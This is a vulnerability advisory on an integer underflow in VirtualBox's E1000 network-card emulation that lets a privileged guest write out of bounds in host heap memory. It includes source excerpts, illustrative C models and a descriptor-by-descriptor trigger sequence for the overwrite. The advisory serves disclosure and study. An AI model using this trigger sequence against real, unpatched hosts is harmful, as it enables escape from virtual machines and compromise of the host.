CVE: CVE-2019-2722
Tested Versions:
- Oracle VirtualBox 5.2.28 and earlier
- Oracle VirtualBox 6.0.6 and earlier
Product URL(s): https://virtualbox.org
VirtualBox is an x86 and AMD64/Intel64 virtualization product for enterprise as well as home use. It is commercially supported by Oracle and is also available as open source software. It runs on various host platforms such as Windows, Linux, Mac and Solaris, and supports a large number of guest operating systems.
Vulnerability Details
The default virtual network device exposed to guest VMs is an Intel PRO/1000 MT Desktop (82540EM), also known as the E1000. A vulnerability was discovered in the VirtualBox code that emulates the E1000 device, allowing the guest to write to the host’s memory, via an integer underflow bug. This allows an attacker with root/administrator privileges in a guest to escape to the host ring 3.
This vulnerability was disclosed via the Pwn2Own programme by ZDI.
Background
To send network packets a guest does what a common PC does: it configures a network card and supplies network packets to it. Network packets supplied to the adaptor are wrapped in Tx (transmit) descriptors. The Tx descriptor is a data structure described in the 82540EM datasheet (317453006EN.PDF, Revision 4.0). It stores metadata such as the packet size, VLAN tag, TCP/IP segmentation enabled flags and so on.
To supply Tx descriptors to the network card, the guest writes them to the Tx ring. This is a ring buffer residing in physical memory at a predefined address. Once all descriptors are written to the Tx ring, the guest updates the E1000 MMIO TDT (Transmit Descriptor Tail) register to tell the host that there are new descriptors to handle.
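The producer/consumer relationship described above can be modelled in a few lines of C. This is a minimal sketch, not VirtualBox or driver code: the tx_desc_t layout, RING_SIZE, and the guest_write_desc() and guest_write_tdt() helpers are hypothetical names chosen for illustration, and a plain array stands in for guest physical memory.

```c
#include <stdint.h>

#define RING_SIZE 8u  /* hypothetical ring length, small for illustration */

/* Simplified stand-in for a Tx descriptor; the real layouts are in the datasheet. */
typedef struct {
    uint64_t buf_addr;
    uint32_t cmd;
    uint32_t status;
} tx_desc_t;

typedef struct {
    tx_desc_t ring[RING_SIZE];
    uint32_t  head;  /* next descriptor the device will consume */
    uint32_t  tail;  /* one past the last descriptor the guest has written */
} tx_ring_t;

/* Guest side: store a descriptor in the ring. The device is not notified yet. */
static void guest_write_desc(tx_ring_t *r, uint32_t idx, tx_desc_t d)
{
    r->ring[idx % RING_SIZE] = d;
}

/* Guest side: update the tail. In this model the "device" reacts immediately
   and consumes every descriptor between head and tail. Returns the number of
   descriptors handled. */
static unsigned guest_write_tdt(tx_ring_t *r, uint32_t new_tail)
{
    unsigned handled = 0;

    r->tail = new_tail % RING_SIZE;
    while (r->head != r->tail) {
        /* A real device model would parse r->ring[r->head] here. */
        r->head = (r->head + 1u) % RING_SIZE;
        handled++;
    }
    return handled;
}
```

Writing three descriptors at indices 0 to 2 and then calling guest_write_tdt(&ring, 3) handles all three in one pass, which mirrors the "write everything, then update TDT" order described above.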
During processing, there are two ways for a data descriptor to be added to the frame:
- e1kAddToFrame() if the segmentation enable flag (fTSE) of this descriptor is off
- e1kFallbackAddToFrame() if the fTSE flag of this descriptor is on
Vulnerability
The vulnerability occurs in the e1kFallbackAddToFrame() function, which can be reached by writing Tx descriptors to the network card memory and telling the host to handle them:
static int e1kFallbackAddToFrame(PE1KSTATE pThis, E1KTXDESC *pDesc, bool fOnWorkerThread) {
    ....
    uint16_t u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN + pThis->contextTSE.dw3.u16MSS;
    ....
    do {
        /* Wraps to a huge value when u16TxPktLen > u16MaxPktLen. */
        uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
        if (cb > pDesc->data.cmd.u20DTALEN) {
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        } else {
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, true /*fSend*/, fOnWorkerThread);
            pThis->u16TxPktLen = pThis->contextTSE.dw3.u8HDRLEN;
        }
        ....
    } while (pDesc->data.cmd.u20DTALEN > 0 && RT_SUCCESS(rc));
    ....
}
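If we can control the values of two variables, u16MaxPktLen and pThis->u16TxPktLen, we can make an integer underflow occur in cb whenever pThis->u16TxPktLen is larger than u16MaxPktLen. Because cb is unsigned, the negative difference wraps to a very large value, the check cb > pDesc->data.cmd.u20DTALEN succeeds, and cb is set to the guest-supplied u20DTALEN.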
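The wrap-around can be reproduced in isolation. The sketch below is a standalone model of the two lines in question, not VirtualBox code: segment_room() and copy_length() are hypothetical helper names, and the model assumes a platform where int is wider than 16 bits.

```c
#include <stdint.h>

/* Mirrors `uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;` from the excerpt. */
static uint32_t segment_room(uint16_t max_pkt_len, uint16_t tx_pkt_len)
{
    /* Both uint16_t operands are promoted to int, so the difference can be
       negative. Storing it in a uint32_t wraps it modulo 2^32. */
    uint32_t cb = (uint32_t)(max_pkt_len - tx_pkt_len);
    return cb;
}

/* Mirrors the `if (cb > u20DTALEN) cb = u20DTALEN;` clamp that follows. */
static uint32_t copy_length(uint16_t max_pkt_len, uint16_t tx_pkt_len,
                            uint32_t dtalen)
{
    uint32_t cb = segment_room(max_pkt_len, tx_pkt_len);
    return cb > dtalen ? dtalen : cb;
}
```

With max_pkt_len = 100 and tx_pkt_len = 101, segment_room() returns 0xFFFFFFFF, so copy_length() always returns the descriptor's own length: the clamp no longer limits the copy to the space left in the packet.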
The function e1kFallbackAddSegment() will then perform a write to the host memory at an offset we control:
static void e1kFallbackAddSegment(PE1KSTATE pThis, RTGCPHYS PhysAddr, uint16_t u16Len, bool fSend, bool fOnWorkerThread) {
    ...
    PDMDevHlpPhysRead(pThis->CTX_SUFF(pDevIns), PhysAddr,
                      pThis->aTxPacketFallback + pThis->u16TxPktLen, u16Len);
    ...
    pThis->u16TxPktLen += u16Len;
    ...
}
The PDMDevHlpPhysRead() function copies u16Len bytes from guest memory, which we control, into the pThis->aTxPacketFallback buffer in host memory at index pThis->u16TxPktLen. Since we also control the value of u16Len, we can overwrite whatever comes after the pThis->aTxPacketFallback buffer.
Thus the integer underflow can lead to a heap out-of-bounds write on the host.
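To make the effect of an unchecked copy at an attacker-influenced index concrete, here is a small, memory-safe model. It is only a sketch: dev_model_t, add_segment(), BUF_SIZE and TAIL_SIZE are hypothetical, the sizes are deliberately tiny, and a single array stands in for both the packet buffer and the data that happens to follow it on the host.

```c
#include <stdint.h>
#include <string.h>

#define BUF_SIZE  16u  /* stand-in for the size of aTxPacketFallback (hypothetical) */
#define TAIL_SIZE 8u   /* stand-in for whatever the host stores after the buffer */

typedef struct {
    /* [0, BUF_SIZE) models the packet buffer, the rest models adjacent data. */
    uint8_t  arena[BUF_SIZE + TAIL_SIZE];
    uint16_t pkt_len;  /* models pThis->u16TxPktLen */
} dev_model_t;

/* Models the copy in e1kFallbackAddSegment(): no check against BUF_SIZE.
   Returns how many bytes past the end of the packet buffer the data now
   reaches, or -1 if the copy would leave the arena (so the demo itself
   never corrupts memory). */
static int add_segment(dev_model_t *d, const uint8_t *src, uint16_t len)
{
    uint32_t end = (uint32_t)d->pkt_len + len;

    if (end > sizeof d->arena)
        return -1;
    memcpy(d->arena + d->pkt_len, src, len);
    d->pkt_len = (uint16_t)end;
    return end > BUF_SIZE ? (int)(end - BUF_SIZE) : 0;
}
```

Starting from pkt_len = 12, an 8-byte segment fills the last 4 bytes of the modelled buffer and spills 4 bytes into the adjacent region, which is the same pattern the real device state would see at a much larger scale.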
Triggering the Out-of-bounds Write
The important variables to determine are, as mentioned above, u16MaxPktLen and u16TxPktLen.
The value of u16MaxPktLen is calculated from the following expression in e1kFallbackAddToFrame() above:
u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN + pThis->contextTSE.dw3.u16MSS
pThis->contextTSE.dw3.u8HDRLEN and pThis->contextTSE.dw3.u16MSS are fields from the context descriptor that the guest writes to the device memory, and they need to pass the following check:
DECLINLINE(void) e1kUpdateTxContext(PE1KSTATE pThis, E1KTXDESC *pDesc) {
    ...
    uint32_t cbMaxSegmentSize = pThis->contextTSE.dw3.u16MSS + pThis->contextTSE.dw3.u8HDRLEN + 4; /*VTAG*/
    if (RT_UNLIKELY(cbMaxSegmentSize > E1K_MAX_TX_PKT_SIZE))
    {
        pThis->contextTSE.dw3.u16MSS = E1K_MAX_TX_PKT_SIZE - pThis->contextTSE.dw3.u8HDRLEN - 4; /*VTAG*/
        ...
So the maximum value of u16MaxPktLen is E1K_MAX_TX_PKT_SIZE - 4 = 0x3F9C.
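The bound can be checked with a small model of the clamp. This is a sketch under stated assumptions: E1K_MAX_TX_PKT_SIZE is taken to be 0x3FA0, which is the value implied by the equation above, and tse_context_t, clamp_mss() and max_pkt_len() are hypothetical names rather than VirtualBox identifiers.

```c
#include <stdint.h>

/* Assumed value, implied by E1K_MAX_TX_PKT_SIZE - 4 = 0x3F9C. */
#define E1K_MAX_TX_PKT_SIZE 0x3FA0u

/* Hypothetical stand-in for the two context-descriptor fields involved. */
typedef struct {
    uint8_t  hdrlen;  /* models contextTSE.dw3.u8HDRLEN */
    uint16_t mss;     /* models contextTSE.dw3.u16MSS */
} tse_context_t;

/* Models the check in e1kUpdateTxContext(): MSS + HDRLEN + 4 (VLAN tag)
   may not exceed E1K_MAX_TX_PKT_SIZE, otherwise MSS is reduced. */
static void clamp_mss(tse_context_t *ctx)
{
    uint32_t cbMaxSegmentSize = (uint32_t)ctx->mss + ctx->hdrlen + 4u;

    if (cbMaxSegmentSize > E1K_MAX_TX_PKT_SIZE)
        ctx->mss = (uint16_t)(E1K_MAX_TX_PKT_SIZE - ctx->hdrlen - 4u);
}

/* Models u16MaxPktLen = u8HDRLEN + u16MSS. */
static uint16_t max_pkt_len(const tse_context_t *ctx)
{
    return (uint16_t)(ctx->hdrlen + ctx->mss);
}
```

Whatever header length is chosen, an oversized MSS is clamped so that max_pkt_len() returns 0x3F9C. An MSS that already satisfies the check, such as E1K_MAX_TX_PKT_SIZE - 4 - 1 with a header length of 0, passes through unchanged.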
During processing, pThis->u16TxPktLen is initialized to 0 and subsequent data descriptors can modify its value.
The data descriptors are handled in e1kXmitDesc(), which, depending on the TSE flag, calls one of two functions. Each of them affects pThis->u16TxPktLen as follows:
- e1kFallbackAddToFrame() if the pDesc->data.cmd.fTSE flag is on
  - computes cb = u16MaxPktLen - pThis->u16TxPktLen
  - increments pThis->u16TxPktLen by cb
- e1kAddToFrame() if the pDesc->data.cmd.fTSE flag is off
  - increases pThis->u16TxPktLen by pDesc->data.cmd.u20DTALEN if the new size is less than E1K_MAX_TX_PKT_SIZE
Now that we understand the logic of how the TX descriptors are handled, we can trigger the out-of-bounds write by sending a series of descriptors:
TX_descriptors[0].context.dw2.u4DTYP = E1K_DTYP_CONTEXT;
TX_descriptors[0].context.dw2.fDEXT = 1;
TX_descriptors[0].context.dw2.fTSE = 1;
TX_descriptors[0].context.dw3.u8HDRLEN = 0;
TX_descriptors[0].context.dw3.u16MSS = E1K_MAX_TX_PKT_SIZE - 4 - 1;
TX_descriptors[0].context.dw2.u20PAYLEN = 0x10000;
The initial context descriptor sets the u16MaxPktLen value to E1K_MAX_TX_PKT_SIZE - 4 - 1 by specifying the MSS.
TX_descriptors[1].data.cmd.u4DTYP = E1K_DTYP_DATA;
TX_descriptors[1].data.cmd.fDEXT = 1;
TX_descriptors[1].data.cmd.fTSE = 1;
TX_descriptors[1].data.cmd.u20DTALEN = E1K_MAX_TX_PKT_SIZE - 4 - 2;
By setting the TSE flag, this data descriptor gets processed by e1kFallbackAddToFrame(), causing the pThis->u16TxPktLen value to be set to E1K_MAX_TX_PKT_SIZE - 4 - 2.
TX_descriptors[2].data.cmd.u4DTYP = E1K_DTYP_DATA;
TX_descriptors[2].data.cmd.fDEXT = 1;
TX_descriptors[2].data.cmd.fTSE = 0;
TX_descriptors[2].data.cmd.u20DTALEN = 2;
The next data descriptor has the TSE flag unset, causing e1kAddToFrame() to increase the pThis->u16TxPktLen value by 2 to E1K_MAX_TX_PKT_SIZE - 4, which is now larger than the u16MaxPktLen set by the first context descriptor.
TX_descriptors[3].data.cmd.u4DTYP = E1K_DTYP_DATA;
TX_descriptors[3].data.cmd.fDEXT = 1;
TX_descriptors[3].data.cmd.fTSE = 1;
TX_descriptors[3].data.cmd.u20DTALEN = overwrite_size;
TX_descriptors[3].data.u64BufAddr = overwrite_buf.QuadPart;
The next data descriptor has the TSE flag set again, which forces the processing to go through e1kFallbackAddToFrame(), where the integer underflow occurs. The copy starts at index E1K_MAX_TX_PKT_SIZE - 4, so overwrite_size - 4 bytes after the host transmit buffer are overwritten with the contents of our controlled overwrite_buf.
TX_descriptors[4].data.cmd.u4DTYP = E1K_DTYP_DATA;
TX_descriptors[4].data.cmd.fDEXT = 1;
TX_descriptors[4].data.cmd.fTSE = 1;
TX_descriptors[4].data.cmd.fEOP = 1;
TX_descriptors[4].data.cmd.u20DTALEN = 0;
This final descriptor just has the EOP flag set to terminate processing.
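The arithmetic of the whole sequence can be traced with a small bookkeeping model that touches no memory. It is a sketch, not the emulator's logic: e1k_model_t and the model_*() helpers are hypothetical, E1K_MAX_TX_PKT_SIZE is assumed to be 0x3FA0 and to be the size of the transmit buffer, HDRLEN is 0 as in the context descriptor above, and the TSE path models only one pass of the loop, which is enough here because every TSE descriptor in this sequence takes the cb > u20DTALEN branch.

```c
#include <stdint.h>

#define E1K_MAX_TX_PKT_SIZE 0x3FA0u  /* assumed value and assumed buffer size */

typedef struct {
    uint16_t max_pkt_len;  /* models u16MaxPktLen */
    uint16_t tx_pkt_len;   /* models pThis->u16TxPktLen */
    uint32_t oob_bytes;    /* bytes that would land past the buffer */
} e1k_model_t;

/* Account for a copy of `len` bytes at the current index. */
static void model_copy(e1k_model_t *m, uint16_t len)
{
    uint32_t start = m->tx_pkt_len;
    uint32_t end = start + len;

    if (end > E1K_MAX_TX_PKT_SIZE)
        m->oob_bytes += end - (start > E1K_MAX_TX_PKT_SIZE ? start : E1K_MAX_TX_PKT_SIZE);
    m->tx_pkt_len = (uint16_t)end;
}

/* One pass of the TSE path (e1kFallbackAddToFrame), with HDRLEN = 0. */
static void model_tse_data(e1k_model_t *m, uint32_t dtalen)
{
    uint32_t cb = (uint32_t)(m->max_pkt_len - m->tx_pkt_len);  /* may wrap */

    if (cb > dtalen) {
        model_copy(m, (uint16_t)dtalen);
    } else {
        model_copy(m, (uint16_t)cb);
        m->tx_pkt_len = 0;  /* segment sent, length reset to HDRLEN */
    }
}

/* The non-TSE path (e1kAddToFrame), using the size check as described above. */
static void model_plain_data(e1k_model_t *m, uint32_t dtalen)
{
    if (m->tx_pkt_len + dtalen < E1K_MAX_TX_PKT_SIZE)
        model_copy(m, (uint16_t)dtalen);
}

/* Replays descriptors 0 to 3 and returns the resulting state. */
static e1k_model_t run_sequence(uint16_t overwrite_size)
{
    e1k_model_t m = {0, 0, 0};

    m.max_pkt_len = (uint16_t)(E1K_MAX_TX_PKT_SIZE - 4u - 1u);  /* [0] context */
    model_tse_data(&m, E1K_MAX_TX_PKT_SIZE - 4u - 2u);          /* [1] TSE on  */
    model_plain_data(&m, 2u);                                   /* [2] TSE off */
    model_tse_data(&m, overwrite_size);                         /* [3] TSE on  */
    return m;
}
```

For overwrite_size = 0x100 the model reports 0xFC bytes past the buffer, matching the overwrite_size - 4 figure given above. For overwrite_size = 4 nothing spills, because the 4 bytes still fit between index E1K_MAX_TX_PKT_SIZE - 4 and the end of the buffer.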
Exploiting this out-of-bounds write allows an attacker to escape the guest VM.
Timeline
- 2019-03-20 Vulnerability reported to vendor via ZDI (Pwn2Own)
- 2019-04-29 Coordinated public release of advisory
Vendor Response
The vendor has acknowledged the issue and released an update to address it.